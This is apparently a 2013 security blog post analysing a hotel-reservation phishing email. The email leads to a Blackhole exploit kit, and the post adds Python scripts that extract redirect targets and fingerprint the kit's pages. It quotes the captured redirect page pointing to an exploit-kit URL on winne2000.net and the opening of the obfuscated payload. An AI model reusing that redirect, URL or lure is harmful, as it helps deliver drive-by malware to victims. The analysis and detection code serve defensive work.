Wednesday, June 19, 2013

Hotel Registration Phishing Campaign with AutoClerk(?)

This particular campaign uses the "shock and awe" billing technique to create urgency: an unexpected charge the recipient is meant to rush to dispute. Delivery-wise it is predictable Blackhole: a redirect page that forwards to the exploit kit landing page.
Also spotted on DSL Reports.


Subject:   Your reservation at HOTEL UNION SQUARE
From:   "Reservations" <reservations@m.personalityhotelsmail.net>
Date:   Wed, June 19, 2013 12:39 pm
Priority:   Normal

Header information:
X-Mailer: AutoClerk <--- Whoa. Stop.
Let's dive:
http://www.autoclerk.com/news/autoclerk-introduces-emarketing-to-its-suite-of-products-and-services
AutoClerk is a hotel property management system that also offers an eMarketing product to hotels.
http://www.autoclerk.com/hotel-emarketing
Keep in mind that X-Mailer is a string the sending software sets, so on its own it shows only that this run was sent through, or is imitating, a mailer that identifies itself as AutoClerk. Hence the question mark in the title.

Content-Type: multipart/alternative; <-- Plain text and HTML parts, OK.
X-Spam-Status: No, score=5.8 <--- Not close enough: it was scored, but stayed under the filter's threshold.



Sent to you from Copenhagen, because clearly that's where Hotel Union Square is... not.






The redirect page uses a refresh to send you on immediately: location.replace() in script, with a meta refresh inside <noscript> as the fallback when JavaScript is off, so the hop happens either way. Nothing new, but the target URL is still useful for pivoting. Note also the visible decoy text: it talks about transfer reference IDs and a wire service team, not a hotel bill, so the page is a recycled template.

<html>
<title>HOTEL UNION SQUARE is loading...</title>
<script type="text/javascript">
<!--
location.replace("http://winne2000.net/news/enough-advise.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=http://winne2000.net/news/enough-advise.php">
</noscript>

</head>

<h1>You will be redirected to process</h1>

<h4 style="color:#364dbc;">We must complete few security checks to show your transfer details:</h4>

<h3>Be sure you have a transfer reference ID.<br />You will be asked to enter it after we check the link.<br><br>Important: Please be advised that calls to and from your wire service team may be monitored or recorded.<br /></h3>

<h3>Redirecting to Complain details... Please wait...</h3>
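Turning that capture into something reusable, as an added example (my script, not from the original post or from any tool it names): a small extractor that pulls every redirect target out of a page like this one, handling both the script redirect and the meta refresh inside <noscript>, then reduces them to hostnames you can block or pivot on. The sample page is reconstructed from the capture above; the domain is the one it shows, everything else is constructed input.

```python
"""Extract redirect targets from a captured phishing landing page.

Added example for this post; not code from the original page or from any
tool mentioned there. It covers the two redirect mechanisms in the capture:
a JavaScript location.replace()/location.href assignment and the <noscript>
meta-refresh fallback for browsers with scripting off. SAMPLE_PAGE is
reconstructed from that capture (constructed input; the target URL is the
one shown in the post).
"""
import re
from html.parser import HTMLParser

# window.location = "...", location.href = "...", location.replace("...")
JS_REDIRECT = re.compile(
    r"""(?:window\.|document\.|top\.)?location(?:\.href|\.replace)?"""
    r"""\s*(?:=|\()\s*(['"])(.*?)\1""",
    re.DOTALL,
)

# content="0; url=http://..."  (the "url=" part and the quotes are optional in practice)
META_URL = re.compile(r"""^\s*\d+\s*;\s*(?:url\s*=\s*)?['"]?([^'"\s>]+)""", re.IGNORECASE)


class MetaRefreshParser(HTMLParser):
    """Collect <meta http-equiv="refresh"> targets and note whether they sit in <noscript>."""

    def __init__(self):
        super().__init__()
        self.targets = []
        self._in_noscript = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # HTMLParser already lowercases attribute names
        if tag == "noscript":
            self._in_noscript = True
        elif tag == "meta" and a.get("http-equiv", "").lower() == "refresh":
            m = META_URL.match(a.get("content", ""))
            if m:
                how = "meta-refresh/noscript" if self._in_noscript else "meta-refresh"
                self.targets.append((how, m.group(1)))

    def handle_endtag(self, tag):
        if tag == "noscript":
            self._in_noscript = False


def extract_redirects(html):
    """Return [(mechanism, url), ...]: script redirects first, then meta refreshes."""
    found = [("javascript", m.group(2)) for m in JS_REDIRECT.finditer(html)]
    parser = MetaRefreshParser()
    parser.feed(html)
    parser.close()
    found.extend(parser.targets)
    return found


def unique_hosts(redirects):
    """Hostnames to pivot on or block, deduplicated in order of first appearance."""
    hosts = []
    for _, url in redirects:
        m = re.match(r"^[a-z][a-z0-9+.-]*://([^/:?#]+)", url, re.IGNORECASE)
        if m and m.group(1).lower() not in hosts:
            hosts.append(m.group(1).lower())
    return hosts


# Constructed sample: the redirect page from the post, with the same missing <head>.
SAMPLE_PAGE = """<html>
<title>HOTEL UNION SQUARE is loading...</title>
<script type="text/javascript">
<!--
location.replace("http://winne2000.net/news/enough-advise.php");
//-->
</script>
<noscript>
<meta http-equiv="refresh" content="0; url=http://winne2000.net/news/enough-advise.php">
</noscript>
</head>
<h1>You will be redirected to process</h1>
<h3>Redirecting to Complain details... Please wait...</h3>
"""

if __name__ == "__main__":
    for how, url in extract_redirects(SAMPLE_PAGE):
        print(f"{how:22} {url}")
    print("hosts:", unique_hosts(extract_redirects(SAMPLE_PAGE)))
```

Both mechanisms should report the same target, as they do here. When they differ, the <noscript> branch is the one a text-mode crawler or a sandbox with scripting disabled would follow, so always check both before deciding what a victim actually reached.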

And the payload it lands on begins with:

<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;try{caewbtew=~312;}catch(vava){az=0;}

Let's go deeper


The caewbtew=~ string at the entry point is consistent with the FedEx, American Airlines, DHL, and PayPal campaigns, with some obfuscation techniques that follow. Oh yes, also the BBB campaign I looked at here. There are two observed variants, one with catch(vava) and one with catch(qw). This is some lovely stuff when coupled with some other indicators, and I've used it very successfully in the past.

This string has also been spotted on other compromised WordPress sites, about 860 indexed by Google.


Those sites also contained the string:
Redirecting to Complain details... Please wait...

Something like 860 hits for that one too. Same as the BBB campaign.
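To put those indicators to work, here is an added example (mine, not code from the post) that fingerprints a page on three of them: the try{IDENT=~NUMBER;}catch(vava|qw){...} entry idiom, the white-on-white <style> that precedes it in the snippet above, and the "Redirecting to Complain details" decoy string. It also reports the same try/catch shape with an unfamiliar catch name, so a third variant gets flagged for a look rather than missed. The four sample pages are constructed; caewbtew, vava, qw, az and 312 come from the post, the other identifiers and numbers are made up.

```python
"""Flag Blackhole-style landing pages by the indicators discussed in the post.

Added example, not code from the original page. Looks for the
try{IDENT=~NUMBER;}catch(vava|qw){...} entry idiom, the white-on-white
<style> in front of it, and the "Redirecting to Complain details" decoy.
Sample pages are constructed; `caewbtew`, `vava`, `qw`, `az` and 312 are
from the post, while `qbxte`/540 and `zzq`/77 are made-up stand-ins for
other variants.
"""
import re

IDENT = r"[A-Za-z_$][\w$]*"

# Known variants: the catch parameter is vava or qw.
ENTRY_KNOWN = re.compile(
    r"try\s*\{\s*(" + IDENT + r")\s*=\s*~\s*\d+\s*;\s*\}\s*catch\s*\(\s*(vava|qw)\s*\)"
)
# Same shape with any catch parameter: worth a look when a new variant shows up.
ENTRY_ANY = re.compile(
    r"try\s*\{\s*(" + IDENT + r")\s*=\s*~\s*\d+\s*;\s*\}\s*catch\s*\(\s*(" + IDENT + r")\s*\)"
)
# Text coloured white (#fff): the decoy body is hidden in plain sight this way.
HIDDEN_CSS = re.compile(
    r"<style>\s*b\s*,\s*div\s*\{\s*color\s*:\s*#fff\s*;?\s*\}\s*</style>", re.I
)
DECOY_TEXT = re.compile(r"Redirecting\s+to\s+Complain\s+details", re.I)


def fingerprint(html):
    """Return {"indicators": {...}, "verdict": "blackhole" | "suspicious" | "clean"}."""
    ind = {}
    m = ENTRY_KNOWN.search(html)
    if m:
        ind["entry_known"] = {"probe": m.group(1), "catch": m.group(2)}
    else:
        m = ENTRY_ANY.search(html)
        if m:
            ind["entry_variant"] = {"probe": m.group(1), "catch": m.group(2)}
    if HIDDEN_CSS.search(html):
        ind["hidden_css"] = True
    if DECOY_TEXT.search(html):
        ind["decoy_text"] = True

    # A known entry idiom is enough on its own; otherwise require two indicators.
    if "entry_known" in ind or len(ind) >= 2:
        verdict = "blackhole"
    elif ind:
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {"indicators": ind, "verdict": verdict}


def scan(pages):
    """Map page name -> verdict for every page that is not clean."""
    out = {}
    for name, html in pages.items():
        verdict = fingerprint(html)["verdict"]
        if verdict != "clean":
            out[name] = verdict
    return out


# Constructed samples. PAGE_A combines the snippet from the post with the decoy string.
PAGE_A = ('<style>b,div{color:#fff;}</style><script>function vq(){s="";zzz();az=21;'
          'try{caewbtew=~312;}catch(vava){az=0;}</script>'
          '<h3>Redirecting to Complain details... Please wait...</h3>')
PAGE_B = '<script>az=21;try{qbxte=~540;}catch(qw){az=0;}</script>'      # qw variant
PAGE_C = '<script>try{load();}catch(e){console.log(e);}</script><h3>Please wait...</h3>'
PAGE_D = '<script>try{zzq=~77;}catch(e){az=0;}</script>'                  # unknown catch name

if __name__ == "__main__":
    for name, html in {"a": PAGE_A, "b": PAGE_B, "c": PAGE_C, "d": PAGE_D}.items():
        print(name, fingerprint(html))
```

The "suspicious" tier is the useful one: it is how you catch the next catch(...) rename without loosening the strong match, and those pages are exactly the ones to eyeball by hand.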

Proving once again that nothing beats a human security analyst:


I'm not going to rehash Blackhole here. We know what's up. Evidence of a broader campaign below.



